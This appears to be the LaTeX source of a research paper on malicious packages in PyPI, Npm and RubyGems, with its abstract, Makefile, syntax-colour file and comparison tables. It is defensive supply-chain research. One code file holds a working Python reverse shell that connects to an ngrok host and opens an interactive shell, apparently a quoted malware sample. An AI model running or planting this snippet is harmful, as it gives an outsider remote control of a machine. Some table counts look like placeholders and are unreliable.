Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages

Package managers have become a vital part of the modern software development process. They allow developers to reuse third-party code, share their own code, minimize their codebase, and simplify the build process. However, recent reports showed that package managers have been abused by attackers to distribute malware, posing significant security risks to developers and end-users. For example, eslint-scope, a package with millions of weekly downloads in Npm, was compromised to steal credentials from developers. To understand the security gaps and the misplaced trust that make recent supply chain attacks possible, we propose a comparative framework to qualitatively assess the functional and security features of package managers for interpreted languages. Based on qualitative assessment, we apply well-known program analysis techniques such as metadata, static, and dynamic analysis to study registry abuse. Our initial efforts found 339 new malicious packages that we reported to the registries for removal. The package manager maintainers confirmed 278 (82%) from the 339 reported packages where three of them had more than 100,000 downloads. For these packages we were issued official CVE numbers to help expedite the removal of these packages from infected victims. We outline the challenges of tailoring program analysis tools to interpreted languages and release our pipeline as a reference point for the community to build on and help in securing the software supply chain.

==> Makefile <==
MAIN ?= p
DIFF ?= HEAD^
CODE := $(addsuffix .tex,$(filter-out %.tex,$(wildcard code/*)))
FIGS := $(patsubst %.svg,%.pdf,$(wildcard fig/*.svg))
ODGS := $(patsubst %.odg,%.pdf,$(wildcard fig/*.odg))
PLOT := $(patsubst %.gp,%.tex,$(wildcard data/*.gp))
DEPS := rev.tex code/fmt.tex abstract.txt $(CODE) $(FIGS) $(ODGS) $(PLOT)
LTEX := --latex-args="-synctex=1 -shell-escape"
BTEX := --bibtex-args="-min-crossrefs=99"
SHELL:= $(shell echo $$SHELL)

UNAME_S := $(shell uname -s)
ifeq ($(UNAME_S),Darwin)
  INKSCAPE=/Applications/Inkscape.app/Contents/Resources/bin/inkscape
  SOFFICE=/Applications/LibreOffice.app/Contents/MacOS/soffice
else
  INKSCAPE=inkscape
  SOFFICE=soffice
endif

all: $(DEPS) ## generate a pdf
	chmod +x bin/latexrun.py bin/mkabstract.py
	@TEXINPUTS="sty:" bin/latexrun.py $(LTEX) $(BTEX) $(MAIN)
	cp latex.out/$(MAIN).synctex.gz .

submit: $(DEPS) ## proposal function
	@for f in $(wildcard submit-*.tex); do \
		TEXINPUTS="sty:" bin/latexrun.py $$f; \
	done

diff: $(DEPS) ## generate diff-highlighed pdf
	chmod +x bin/diff.sh
	@bin/diff.sh $(DIFF)

help: ## print help
	@grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) \
	  | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-10s\033[0m %s\n", $$1, $$2}'

rev.tex: FORCE
	@printf '\\gdef\\therev{%s}\n\\gdef\\thedate{%s}\n' \
	   "$(shell git rev-parse --short HEAD)"            \
	   "$(shell git log -1 --format='%ci' HEAD)" > $@

code/%.tex: code/% ## build highlighted tex code from source code
	pygmentize -P tabsize=4 -P mathescape -f latex $^ | bin/mark.py > $@

code/fmt.tex: ## generate color table
	pygmentize -f latex -S default > $@

fig/%.pdf: fig/%.svg ## generate pdf from svg
	$(INKSCAPE) --without-gui -f ${CURDIR}/$^ -D -A ${CURDIR}/$@

fig/%.pdf: fig/%.odg ## generate pdf from LibreOffice Draw
	$(SOFFICE) --convert-to pdf $< --outdir $(@D)
	pdfcrop $@ $@

data/%.tex: data/%.gp ## generate plot
	gnuplot $^

draft: $(DEPS) ## generate pdf with a draft info
	echo -e '\\newcommand*{\\DRAFT}{}' >> rev.tex
	@TEXINPUTS="sty:" bin/latexrun.py $(BTEX) $(MAIN)

watermark: $(DEPS) ## generate pdf with a watermark
	echo -e '\\usepackage[firstpage]{draftwatermark}' >> rev.tex
	@TEXINPUTS="sty:" bin/latexrun.py $(BTEX) $(MAIN)

spell: ## run a spell check
	@for i in *.tex fig/*.tex; do bin/aspell.sh tex $$i; done
	@for i in *.tex; do bin/double.pl $$i; done
	@for i in *.tex; do bin/abbrv.pl  $$i; done
	@bin/hyphens.sh *.tex
	@pdftotext $(MAIN).pdf /dev/stdout | grep '??'
	@for i in fig/*.svg; do bin/aspell.sh svg $$i; done
	@for i in code/*.c; do bin/aspell.sh code $$i; done

bib: all ## print bib used in the paper
	bibexport latex.out/$(MAIN).aux

clean: ## clean up
	@bin/latexrun.py --clean
	rm -f abstract.txt
	rm -f $(MAIN).synctex.gz

distclean: clean ## clean up completely
	rm -f code/*.tex
	rm -rf _minted_p

abstract.txt: 01_abstract.tex $(MAIN).tex ## generate abstract.txt
	@bin/mkabstract.py $(MAIN).tex $< | fmt -w72 > $@

.PHONY: all help FORCE draft clean spell distclean init bib


==> code/fmt.tex <==
\makeatletter
\def\PY@reset{\let\PY@it=\relax \let\PY@bf=\relax%
    \let\PY@ul=\relax \let\PY@tc=\relax%
    \let\PY@bc=\relax \let\PY@ff=\relax}
\def\PY@tok#1{\csname PY@tok@#1\endcsname}
\def\PY@toks#1+{\ifx\relax#1\empty\else%
    \PY@tok{#1}\expandafter\PY@toks\fi}
\def\PY@do#1{\PY@bc{\PY@tc{\PY@ul{%
    \PY@it{\PY@bf{\PY@ff{#1}}}}}}}
\def\PY#1#2{\PY@reset\PY@toks#1+\relax+\PY@do{#2}}

\expandafter\def\csname PY@tok@gd\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.63,0.00,0.00}{##1}}}
\expandafter\def\csname PY@tok@gu\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.50,0.00,0.50}{##1}}}
\expandafter\def\csname PY@tok@gt\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.27,0.87}{##1}}}
\expandafter\def\csname PY@tok@gs\endcsname{\let\PY@bf=\textbf}
\expandafter\def\csname PY@tok@gr\endcsname{\def\PY@tc##1{\textcolor[rgb]{1.00,0.00,0.00}{##1}}}
\expandafter\def\csname PY@tok@cm\endcsname{\let\PY@it=\textit\def\PY@tc##1{\textcolor[rgb]{0.25,0.50,0.50}{##1}}}
\expandafter\def\csname PY@tok@vg\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.10,0.09,0.49}{##1}}}
\expandafter\def\csname PY@tok@m\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@mh\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@go\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.53,0.53,0.53}{##1}}}
\expandafter\def\csname PY@tok@ge\endcsname{\let\PY@it=\textit}
\expandafter\def\csname PY@tok@vc\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.10,0.09,0.49}{##1}}}
\expandafter\def\csname PY@tok@il\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@cs\endcsname{\let\PY@it=\textit\def\PY@tc##1{\textcolor[rgb]{0.25,0.50,0.50}{##1}}}
\expandafter\def\csname PY@tok@cp\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.74,0.48,0.00}{##1}}}
\expandafter\def\csname PY@tok@gi\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.63,0.00}{##1}}}
\expandafter\def\csname PY@tok@gh\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.00,0.50}{##1}}}
\expandafter\def\csname PY@tok@ni\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.60,0.60,0.60}{##1}}}
\expandafter\def\csname PY@tok@nl\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.63,0.63,0.00}{##1}}}
\expandafter\def\csname PY@tok@nn\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.00,1.00}{##1}}}
\expandafter\def\csname PY@tok@no\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.53,0.00,0.00}{##1}}}
\expandafter\def\csname PY@tok@na\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.49,0.56,0.16}{##1}}}
\expandafter\def\csname PY@tok@nb\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@nc\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.00,1.00}{##1}}}
\expandafter\def\csname PY@tok@nd\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.67,0.13,1.00}{##1}}}
\expandafter\def\csname PY@tok@ne\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.82,0.25,0.23}{##1}}}
\expandafter\def\csname PY@tok@nf\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.00,1.00}{##1}}}
\expandafter\def\csname PY@tok@si\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.73,0.40,0.53}{##1}}}
\expandafter\def\csname PY@tok@s2\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@vi\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.10,0.09,0.49}{##1}}}
\expandafter\def\csname PY@tok@nt\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@nv\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.10,0.09,0.49}{##1}}}
\expandafter\def\csname PY@tok@s1\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@sh\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@sc\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@sx\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@bp\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@c1\endcsname{\let\PY@it=\textit\def\PY@tc##1{\textcolor[rgb]{0.25,0.50,0.50}{##1}}}
\expandafter\def\csname PY@tok@kc\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@c\endcsname{\let\PY@it=\textit\def\PY@tc##1{\textcolor[rgb]{0.25,0.50,0.50}{##1}}}
\expandafter\def\csname PY@tok@mf\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@err\endcsname{\def\PY@bc##1{\setlength{\fboxsep}{0pt}\fcolorbox[rgb]{1.00,0.00,0.00}{1,1,1}{\strut ##1}}}
\expandafter\def\csname PY@tok@kd\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@ss\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.10,0.09,0.49}{##1}}}
\expandafter\def\csname PY@tok@sr\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.40,0.53}{##1}}}
\expandafter\def\csname PY@tok@mo\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@kn\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@mi\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@gp\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.00,0.50}{##1}}}
\expandafter\def\csname PY@tok@o\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.40,0.40,0.40}{##1}}}
\expandafter\def\csname PY@tok@kr\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@s\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@kp\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@w\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.73,0.73}{##1}}}
\expandafter\def\csname PY@tok@kt\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.69,0.00,0.25}{##1}}}
\expandafter\def\csname PY@tok@ow\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.67,0.13,1.00}{##1}}}
\expandafter\def\csname PY@tok@sb\endcsname{\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}
\expandafter\def\csname PY@tok@k\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.00,0.50,0.00}{##1}}}
\expandafter\def\csname PY@tok@se\endcsname{\let\PY@bf=\textbf\def\PY@tc##1{\textcolor[rgb]{0.73,0.40,0.13}{##1}}}
\expandafter\def\csname PY@tok@sd\endcsname{\let\PY@it=\textit\def\PY@tc##1{\textcolor[rgb]{0.73,0.13,0.13}{##1}}}

\def\PYZbs{\char`\\}
\def\PYZus{\char`\_}
\def\PYZob{\char`\{}
\def\PYZcb{\char`\}}
\def\PYZca{\char`\^}
\def\PYZam{\char`\&}
\def\PYZlt{\char`\<}
\def\PYZgt{\char`\>}
\def\PYZsh{\char`\#}
\def\PYZpc{\char`\%}
\def\PYZdl{\char`\$}
\def\PYZhy{\char`\-}
\def\PYZsq{\char`\'}
\def\PYZdq{\char`\"}
\def\PYZti{\char`\~}
% for compatibility with earlier versions
\def\PYZat{@}
\def\PYZlb{[}
\def\PYZrb{]}
\makeatother



==> code/pyconau-funtimes.tex <==
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("0.tcp.ngrok.io",36946));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

==> tables/api-comparison.tex <==
\begin{table}[t]
\footnotesize
\centering
\caption{Examples and statistics of manually labeled APIs for different runtime environments.}
\label{tab:api-comparison}
\begin{tabular}{c|c|c|c|c|c}
\multicolumn{2}{c|}{Runtime} & Python & Node.js & Ruby & PHP \\
\hline
% 
%
\multirow{3}{*}{Network}
 & Source & socket.recv & https.get & Socket.recv & socket\_read  \\
 & Sink & socket.send & socket.write & Socket.send & socket\_send \\
 & Total & 66 & 77 & 88 & 99 \\
\hline
%
\multirow{3}{*}{Filesystem}
 & Source & read & read & read & read \\
 & Sink & write & write & write & write \\
 & Total & 35 & 44 & 55 & 66 \\
\hline
%
\multirow{3}{*}{Process}
 & Source & $\oslash$ & $\oslash$ & $\oslash$ & $\oslash$ \\
 & Sink & popen & popen & popen & popen \\
 & Total & 35 & 44 & 55 & 66 \\
\hline
%
\multirow{3}{*}{CodeGen}
 & Source & $\oslash$ & $\oslash$ & $\oslash$ & $\oslash$ \\
 & Sink & eval & eval & eval & eval \\
 & Total & 35 & 66 & 77 & 88 \\
\hline
\end{tabular}
\vspace{-2mm}
\end{table}


==> tables/pm-comparison.tex <==
\begin{table*}[!t]
\footnotesize
\centering
\begin{threeparttable}
% \tiny
\begin{tabular}{llc|ccc|ccl|ccc}
%
\toprule
\multirow{2}{*}{\textbf{PM}} & \multirow{2}{*}{\textbf{Language}} & \multirow{2}{*}{\textbf{Packages}} & \multicolumn{3}{|c|}{\textbf{Types of Run}} & \multicolumn{3}{|c|}{\textbf{Deployments}} & \multicolumn{3}{|c}{\textbf{Security Features}} \\
{} & {} & {} & \textbf{Install} & \textbf{Execute} & \textbf{Import} & \textbf{Developer} & \textbf{Prod Server} & \textbf{User} & \textbf{Review} & \textbf{Signing} & \textbf{2FA} \\
% How about Security Team?
%
\midrule
% 
% FIXME: the following numbers and features are taken from the stats page for each PM on Jun 13, 2019
% TODO: add comparison of analysis?
% 
% With setup scripts
PyPI & Python & 183K & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\Circle$ & $\CIRCLE$ \\
Npm & JavaScript & 975K & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE\dagger$ & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ \\
RubyGems & Ruby & 153K & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ \\
% Without setup scripts
% signing in progress
% https://github.com/composer/composer/issues/6941
% Packagist & Php & 227K & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\Circle$ & $\Circle$ \\
% requires sonatype account
% https://issues.sonatype.org/secure/Signup!default.jspa
% https://help.sonatype.com/repomanager3/security
% Maven & Java & 286K & $\Circle$ & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$$\ddagger$ & $\Circle$ & $\CIRCLE$ & $\Circle$ \\
%
% FIXME: currently, we ignore windows binaries and linux binaries
% How about AptGet, AUR, Nuget
%
\bottomrule
% 
\end{tabular}
\begin{tablenotes}
\item $\dagger$ Websites implement features using client-side JavaScript and Npm hosts generic JavaScript packages such as JQuery.
\item $\ddagger$ Android apps are mainly written in Java and can directly use Maven packages.
\end{tablenotes}
%
\end{threeparttable}


  \caption{Comparison between different package managers, the total number of packages are snapshoted in August 2019.}
  \label{tab:pm-comparison}
  \vspace{-2mm}
\end{table*}



==> tables/pm-framework-compare.tex <==
% Learning: position of tables: !t vs t
% https://tex.stackexchange.com/questions/401035/half-page-left-blank-before-a-new-section-when-there-is-a-big-table
\begin{table}[!t]
\footnotesize
\centering
\caption{Framework for comparison of registries.}
\label{tab:framework-compare}
\begin{tabular}{c|l|l|ccc}
\multicolumn{3}{c|}{\multirow{2}{*}{\textbf{Features}}} & \multicolumn{3}{c}{\textbf{Registries}} \\
\multicolumn{3}{c}{} & \multicolumn{1}{|c}{PyPI} & \multicolumn{1}{c}{Npm} & \multicolumn{1}{c}{RubyGems} \\ 
\hline
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% functional features
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\multirow{22}{*}{\rotatebox{90}{\textbf{Functional}}}
% PM access the registry
& \multirow{4}{*}{\rotatebox{90}{Access}} & Password & $\CIRCLE$ &  $\CIRCLE$ &  $\CIRCLE$ \\
% PyPI added token support
% http://pyfound.blogspot.com/2019/07/pypi-now-supports-uploading-via-api.html
% after you first type your username/password, token will be saved in NpmJS and RubyGems.
 &  & Access Token  & $\RIGHTcircle$ & $\CIRCLE$ & $\CIRCLE$ \\
 &  & Public Key Auth & $\Circle$ & $\Circle$ & $\Circle$ \\ 
 &  & Multi-Factor Auth & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\
 % open source of packages, registries and clients
 % TODO: managed uploads would implicitly imply this?
% &  & Source Code & $\Circle$ & $\Circle$ & $\Circle$ \\
 \cline{3-6}
% RM/PM packages the releases
 & \multirow{5}{*}{\rotatebox{90}{Publish}} & Upload & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ \\
 &  & Reference & $\Circle$ & $\Circle$ & $\Circle$ \\
% https://blog.npmjs.org/post/172999548390/new-pgp-machinery
% https://dzone.com/articles/package-signing-in-pip-it-works-in-a-roundabout-so
% https://guides.rubygems.org/security/
% https://github.com/composer/composer/issues/4022
 &  & Signing & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\ 
% https://github.com/pypa/warehouse/issues/4998
% https://github.com/pypa/warehouse/issues/5117
% https://blog.npmjs.org/post/168978377570/new-package-moniker-rules
% https://github.com/rubygems/rubygems.org/pull/2037
 &  & Typo Guard & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ \\
% known security problems related to the package
% &  & Known Vulnerabilities & $\oslash$ & $\CIRCLE$ & $\CIRCLE$ \\
% the hypothesis is that longer names are harder to typosquatting and easier to detect?
% https://discuss.python.org/t/namespace-support-in-pypi/1609/26
 &  & Namespace & $\Circle$ & $\RIGHTcircle$ & $\Circle$ \\
\cline{3-6}
% RM/PM manages packages/releases
% can remove, but cannot upload new version with different content
% https://github.com/pypa/warehouse/issues/5837
% after unpublished, that specific name and version combination can never be reused. e.g. the well-known left-pad issue 
% https://docs.npmjs.com/cli/unpublish
% not sure if it's possible to override old version
% https://guides.rubygems.org/command-reference/
% https://github.com/rubygems/rubygems.org/pull/1396
 & \multirow{4}{*}{\rotatebox{90}{Manage}} & Yank Package & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\
% https://github.com/pypa/warehouse/issues/345
% https://docs.npmjs.com/cli/deprecate
% https://docs.ruby-lang.org/en/2.1.0/Gem/Deprecate.html
 &  & Deprecate Package & $\Circle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\ 
%
% https://guides.rubygems.org/command-reference/#owner
 &  & Add Collaborator & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\
% https://github.com/pypa/warehouse/issues/1745
% https://docs.npmjs.com/transferring-a-package-from-a-user-account-to-another-user-account
% https://guides.rubygems.org/command-reference/
 &  & Transfer Ownership & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\ 
% in terms of reference publishing, the transfer may be updating repository URL?
\cline{3-6}
% Dev selects packages
 & \multirow{5}{*}{\rotatebox{90}{Select}} & Reputation & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ \\
% How well code is written
 &  & Code Quality & $\Circle$ & $\Circle$ & $\Circle$ \\
% MFA enabled, signing etc.
 &  & Security Practice & $\Circle$ & $\Circle$ & $\Circle$ \\ 
% known vulnerabilities
 &  & Known Issue & $\Circle$ & $\Circle$ & $\Circle$ \\
% detects typo during while installing/selecting packages
 &  & Typo Detection & $\Circle$ & $\Circle$ & $\CIRCLE$ \\ 
\cline{3-6}
% Dev installs packages
 & \multirow{4}{*}{\rotatebox{90}{Install}} & Hook & $\CIRCLE$ & $\RIGHTcircle$ & $\Circle$ \\ 
 &  & Dependency Locking & $\Circle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\
% extension building in RubyGems is abused as Hook.
 &  & Native Extension & $\RIGHTcircle$ & $\RIGHTcircle$ & $\RIGHTcircle$ \\
 &  & Embedded Binary & $\RIGHTcircle$  & $\RIGHTcircle$  & $\RIGHTcircle$ \\
% Dev uses packages, maybe?
% RM related stuff
% whether source code are available or not. correlate this with number of CVEs?
% &  & Registry Source & $\CIRCLE_{A}$ & $\Circle_{A}$ & $\CIRCLE_{A}$ \\
% &  & Client Source & $\CIRCLE_{A}$  & $\CIRCLE_{A}$ & $\CIRCLE_{A}$ \\
% is RM a community or company?
\hline
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% security features
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\multirow{12}{*}{\rotatebox{90}{\textbf{Review}}} 
% check for metadata
% Npm identifies known vulnerable dependencies and notifies packages
& \multirow{4}{*}{\rotatebox{90}{Metadata}} & Dependency Check & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Update Inspection & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Binary Inspection & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & PM Account & $\Circle$ & $\Circle$ & $\Circle$ \\
\cline{3-6} 
% check for static behaviors, not supported at registry level
% https://www.npmjs.com/package/stylelint
& \multirow{3}{*}{\rotatebox{90}{Static}} & Stylistic Lint & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Logical Lint & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Suspicious Logic & $\Circle$ & $\Circle$ & $\Circle$ \\ 
\cline{3-6}
% check for dynamic behaviors
& \multirow{4}{*}{\rotatebox{90}{Dynamic}} & Install & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Embedded Binary & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Import & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Functional & $\Circle$ & $\Circle$ & $\Circle$ \\ 
\hline
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% mitigation features
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% remove the malware and propose patches
\multirow{7}{*}{\rotatebox{90}{\textbf{Remediation}}}
 & \multirow{3}{*}{\rotatebox{90}{Remove}} & Package & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ \\
 &  & Publisher & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ \\
% &  & Similar Package & $\oslash$ & $\Circle$ & $\oslash$ \\
% https://github.com/pypa/pip/issues/5777
 &  & Installed Package & $\Circle$ & $\Circle$ & $\Circle$ \\
% TODO: track the cause. should we mention blame/causal here? say, why the vulnerability/malware showed up etc.?
\cline{3-6}
% notify affected parties
 & \multirow{4}{*}{\rotatebox{90}{Notify}} & PM & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Dependent PM & $\Circle$ & $\Circle$ & $\Circle$ \\
 &  & Dev & $\Circle$ & $\Circle$ & $\Circle$ \\
% https://github.com/pyupio/safety
% https://www.npmjs.com/advisories
% https://github.com/rubysec/ruby-advisory-db
 &  & Advisory DB & $\Circle$ & $\CIRCLE$ & $\CIRCLE$ \\
%
\hline
%
\end{tabular}
\begin{tablenotes}
\centering
% the symbols used in the table
% unicode math symbols
% http://mirrors.ibiblio.org/CTAN/macros/latex/contrib/unicode-math/unimath-symbols.pdf
\item unsupported - $\Circle$, optional - $\RIGHTcircle$, enforced - $\CIRCLE$
%
\end{tablenotes}
%
\vspace{-6mm}
\end{table}


==> tables/taint-comparison.tex <==
\begin{table*}[!t]
\footnotesize
\centering
\begin{threeparttable}
\begin{tabular}{ll|ccccc|cc|ccc}
%
\toprule
% Compare tools in terms of sensitivity, and other aspects (Library Handling)
% reference: https://cs.au.dk/~amoeller/spa/spa.pdf
\multirow{2}{*}{\textbf{Tool}} & \multirow{2}{*}{\textbf{Language}} & 
\multicolumn{5}{|c|}{\textbf{Taint Sensitivity}} & \multicolumn{2}{|c|}{\textbf{Summarization}} & 
\multicolumn{3}{|c}{\textbf{External Modeling}} \\
{} & {} & \textbf{Path} & \textbf{Context} & \textbf{Flow} & \textbf{Field} & \textbf{Object} &
\textbf{Argument} & \textbf{Callback} & \textbf{Wrapper} & \textbf{Native} & \textbf{Type} \\
%
\midrule
PyT~\cite{pyt} & Python & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\Circle$ & $\Circle$ & & & \\
JSPrime~\cite{jsprime} & JavaScript & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\Circle$ & $\Circle$ & $\Circle$ & & & \\
Brakeman~\cite{brakeman} & Ruby & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & & & \\
Progpilot~\cite{progpilot} & Php & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\Circle$ & $\Circle$ & $\Circle$ & & & \\
% FlowDroid~\cite{flowdroid} & Java & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & $\CIRCLE$ & & & \\
%
\bottomrule
% 
\end{tabular}
%
\end{threeparttable}


  \caption{Comparison between taint analysis tools of different languages.}
  \label{tab:taint-comparison}
  \vspace{-2mm}
\end{table*}

